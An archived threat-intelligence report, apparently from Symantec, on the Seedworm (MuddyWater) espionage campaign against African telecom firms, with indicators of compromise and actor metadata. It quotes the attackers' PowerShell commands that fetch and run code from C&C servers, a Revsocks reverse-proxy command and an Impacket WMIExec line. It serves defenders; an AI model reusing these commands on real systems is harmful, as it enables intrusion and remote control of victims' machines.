{ "id": "804599bc-54c7-480e-a3b9-d4cbc69aa8af", "created_at": "2026-04-06T00:10:54.865386Z", "updated_at": "2026-04-10T03:34:22.584459Z", "deleted_at": null, "sha1_hash": "8e14048ed30537f0e773f766bbe394f290574eea", "title": "Seedworm: Iranian Hackers Target Telecoms Orgs in North and East Africa", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 62364, "plain_text": "Seedworm: Iranian Hackers Target Telecoms Orgs in North and East\r\nAfrica\r\nBy About the Author\r\nArchived: 2026-04-05 12:46:48 UTC\r\nIranian espionage group Seedworm (aka Muddywater) has been targeting organizations operating in the telecommunications\r\nsector in Egypt, Sudan, and Tanzania. \r\nSeedworm has been active since at least 2017, and has targeted organizations in many countries, though it is most strongly\r\nassociated with attacks on organizations in the Middle East. It has been publicly stated that Seedworm is a cyberespionage\r\ngroup that is believed to be a subordinate part of Iran’s Ministry of Intelligence and Security (MOIS).\r\nThe attackers used a variety of tools in this activity, which occurred in November 2023, including leveraging the\r\nMuddyC2Go infrastructure, which was recently discovered and documented by Deep Instinct. Researchers on Symantec’s\r\nThreat Hunter Team, part of Broadcom, found a MuddyC2Go PowerShell launcher in the activity we investigated.\r\nThe attackers also use the SimpleHelp remote access tool and Venom Proxy, which have previously been associated with\r\nSeedworm activity, as well as using a custom keylogging tool, and other publicly available and living-off-the-land tools.\r\nAttack Chain\r\nThe attacks in this campaign occurred in November 2023. Most of the activity we observed occurred on one\r\ntelecommunications organization. The first evidence of malicious activity was some PowerShell executions related to the\r\nMuddyC2Go backdoor.\r\nA MuddyC2Go launcher named “vcruntime140.dll” was saved in the folder “csidl_common_appdata\\javax”, which seems\r\nto have been sideloaded by jabswitch.exe. Jabswitch.exe is a legitimate Java Platform SE 8 executable.\r\nThe MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C\u0026C) server:\r\ntppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp;$tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjw\r\n=\"http://95.164.38.99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf\";$response = Invoke-WebRequest -Uri $uri -Method\r\nGET -ErrorAction Stop -usebasicparsing;iex $response.Content;\r\nIt appears that the variables at the beginning of the code are there for the purposes of attempting to bypass detection by\r\nsecurity software, as they are unused and not relevant.\r\nRight after this execution, attackers launched the MuddyC2Go malware using a scheduled task that had previously been\r\ncreated:\r\n\"CSIDL_SYSTEM\\schtasks.exe\" /run /tn \"Microsoft\\Windows\\JavaX\\Java Autorun\"\r\nThe attackers also used some typical commands related to the Impacket WMIExec hacktool:\r\ncmd.exe /Q /c cd \\ 1\u003e \\\\127.0.0.1\\ADMIN$\\__1698662615.0451615 2\u003e\u00261\r\nThe SimpleHelp remote access tool was also leveraged, connecting to the 146.70.124[.]102 C\u0026C server. Further PowerShell\r\nstager execution also occurred, while the attacker also executed the Revsocks tool:\r\nCSIDL_COMMON_APPDATA\\do.exe -co 94.131.3.160:443 -pa super -q\r\nThe attackers also used a second legitimate remote access tool, AnyDesk, which was deployed on the same computer as\r\nRevsocks and SimpleHelp, while PowerShell executions related to MuddyC2Go also occurred on the same machine: \r\n$uri =\"http://45.150.64.39:443/HJ3ytbqpne2tsJTEJi2D8s0hWo172A0aT\";$response = Invoke-WebRequest -Uri $uri -\r\nMethod GET -ErrorAction Stop -usebasicparsing;iex $response.Content;\r\nNotably, this organization is believed to have previously been infiltrated by Seedworm earlier in 2023. The primary activity\r\nof note during that intrusion was extensive use of SimpleHelp to carry out a variety of activity, including: \r\nLaunching PowerShell\r\nLaunching a proxy tool\r\nDumping SAM hives\r\nUsing WMI to get drive info\r\nInstalling the JumpCloud remote access software\r\nDelivering proxy tools, a suspected LSASS dump tool, and a port scanner.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms\r\nPage 1 of 3\n\nDuring that intrusion, it’s believed the attackers used WMI to launch the SimpleHelp installer on the victim network. At the\r\ntime, this activity couldn’t be definitively linked to Seedworm, but this subsequent activity appears to show that the earlier\r\nactivity was carried out by the same group of attackers.\r\nIn another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to\r\nconnect to known Seedworm infrastructure. A custom build of the Venom Proxy hacktool was also executed on this network,\r\nas well as the new custom keylogger used by the attackers in this activity.\r\nIn the third organization targeted, Venom Proxy was also used, in addition to AnyDesk and suspicious Windows Scripting\r\nFiles (WSF) that have been associated with Seedworm activity in the past. \r\nToolset\r\nThe most interesting part of the toolset used in this activity is probably the presence of the MuddyC2Go launcher, which was\r\nsideloaded by jabswitch.exe.\r\nThe malware reads the C\u0026C URL from the Windows registry value “End” stored inside the key\r\n“HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\Tcpip”. The URL path is read from the “Status” value in the same\r\naforementioned key.\r\nLastly, the MuddyC2GO launcher executes the following PowerShell command to contact its C\u0026C server and execute the\r\nPowerShell code received:\r\npowershell.exe -c $uri ='{C2_URI}';$response = Invoke-WebRequest -UseBasicParsing -Uri $uri -Method GET -\r\nErrorAction Stop;Write-Output $response.Content;iex $response.Content;\r\nThe MuddyC2Go framework was first publicly written about in a blog published by Deep Instinct researchers on November\r\n8, 2023. That blog documented its use in attacks on organizations in countries in the Middle East. The researchers said the\r\nframework may have been used by Seedworm since 2020. They also said that the framework, which is written in Go, has\r\nreplaced Seedworm’s previous PhonyC2 C\u0026C infrastructure. This replacement appears to have occurred after the PhonyC2\r\nsource code was leaked earlier in 2023. The full capabilities of MuddyC2Go are not yet known, but the executable contains\r\nan embedded PowerShell script that automatically connects to Seedworm’s C\u0026C server, which eliminates the need for\r\nmanual execution by an operator and gives the attackers remote access to a victim machine. Deep Instinct said it was able to\r\nlink MuddyC2Go to attacks dating back to 2020 due to the unique URL patterns generated by the framework. It also said\r\nthat the MuddyC2Go servers it observed were hosted at “Stark Industries”, which is a VPS provider that is known to host\r\nmalicious activity. \r\nOther tools of note used in this activity included SimpleHelp, which is a legitimate remote device control and management\r\ntool, for persistence on victim machines. SimpleHelp is believed to have been used in attacks carried out by Seedworm since\r\nat least July 2022. Once installed on a victim device, SimpleHelp can constantly run as a system service, which makes it\r\npossible for attackers to gain access to the user’s device at any point in time, even after a reboot. SimpleHelp also allows\r\nattackers to execute commands on a device with administrator privileges. SimpleHelp is now strongly associated with\r\nSeedworm activity and the tool is installed on several of Seedworm’s servers.\r\nVenom Proxy is a publicly available tool that is described as “a multi-hop proxy tool developed for penetration testers.” It is\r\nwritten in Go. It can be used to easily proxy network traffic to a multi-layer intranet, and easily manage intranet nodes. It has\r\nbeen associated with Seedworm since at least mid-2022, with Microsoft describing it as Seedworm’s “tool of choice” in an\r\nAugust 2022 blog. Seedworm tends to use a custom build of Venom Proxy in its activity. \r\nOther tools used in this activity include:\r\nRevsocks - A cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a\r\nfirewall.\r\nAnyDesk - A legitimate remote desktop application. It and similar tools are often used by attackers to obtain remote\r\naccess to computers on a network. \r\nPowerShell - Seedworm makes heavy use of PowerShell, as well as PowerShell-based tools and scripts in its attacks.\r\nPowerShell is a Microsoft scripting tool that can be used to run commands, download payloads, traverse\r\ncompromised networks, and carry out reconnaissance.\r\nCustom keylogger\r\nConclusion\r\nSeedworm has long had an interest in telecommunications organizations, as do many groups engaged in cyberespionage\r\nactivities. However, its strong focus on African organizations in this campaign is notable as, while it has been known to\r\ntarget organizations in Africa in the past, it does generally primarily focus on organizations in countries in the Middle East.\r\nThat one of the victim organizations in this campaign is based in Egypt is also of note given Egypt’s proximity to Israel, a\r\nfrequent target of Seedworm. \r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms\r\nPage 2 of 3\n\nSeedworm appears to remain focused on using a wide array of living-off-the-land and publicly available tools in its attack\r\nchains, no doubt in an effort to remain undetected on victim networks for as long as possible. However, its recent more wide\r\nadoption of new C\u0026C infrastructure in the form of MuddyC2Go is notable and shows that the group continues to innovate\r\nand develop its toolset when required in order to keep its activity under the radar. While the group uses a lot of living-off-the-land and publicly available tools, it is also capable of developing its own custom tools, such as the custom build of\r\nVenom Proxy and the custom keylogger used in this campaign. The group still makes heavy use of PowerShell and\r\nPowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on\r\ntheir networks. \r\nThe activity observed by Symantec’s Threat Hunter Team took place in November 2023, showing that Seedworm is very\r\nmuch a currently active threat faced by organizations that may be of strategic interest to Iranian threat actors. \r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nFile Indicators\r\n1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca – MuddyC2Go DLL launcher\r\n25b985ce5d7bf15015553e30927691e7673a68ad071693bf6d0284b069ca6d6a – Benign Java(TM) Platform SE 8 executable\r\nused for sideloading MuddyC2Go DLL\r\neac8e7989c676b9a894ef366357f1cf8e285abde083fbdf92b3619f707ce292f – Custom keylogger\r\n3916ba913e4d9a46cfce437b18735bbb5cc119cc97970946a1ac4eab6ab39230 – Venom Proxy\r\nNetwork Indicators\r\n146.70.124[.]102 – SimpleHelp C\u0026C server\r\n94.131.109[.]65 – MuddyC2Go C\u0026C server\r\n95.164.38[.]99 –MuddyC2Go C\u0026C server\r\n45.67.230[.]91 – MuddyC2Go C\u0026C server\r\n45.150.64(.)39 - MuddyC2Go C\u0026C server\r\n95.164.46[.]199 – MuddyC2Go C\u0026C server\r\n94.131.98[.]14 – MuddyC2Go C\u0026C server\r\n94.131.3[.]160 – GoSOCKS5proxy C\u0026C server\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms" ], "report_names": [ "iran-apt-seedworm-africa-telecoms" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434254, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8e14048ed30537f0e773f766bbe394f290574eea.pdf", "text": "https://archive.orkl.eu/8e14048ed30537f0e773f766bbe394f290574eea.txt", "img": "https://archive.orkl.eu/8e14048ed30537f0e773f766bbe394f290574eea.jpg" } }